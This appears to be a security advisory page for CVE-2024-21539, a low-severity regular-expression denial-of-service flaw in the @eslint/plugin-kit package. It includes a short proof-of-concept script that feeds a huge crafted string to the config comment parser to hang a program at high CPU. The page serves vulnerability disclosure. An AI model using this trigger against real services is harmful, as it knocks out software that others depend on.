DirectorySecurity Advisories
Sign In
Security Advisories

CVE-2024-21539

Published

Last updated

NVD

https://nvd.nist.gov/vuln/detail/CVE-2024-21539

CGA ID

CGA-v55f-9838-wrpj

Severity

3.5

Low

CVSS V3

Summary

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Description

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` 
// then the program will stuck forever with high CPU usage

References

Affected packages


Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2024 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Product

Chainguard Images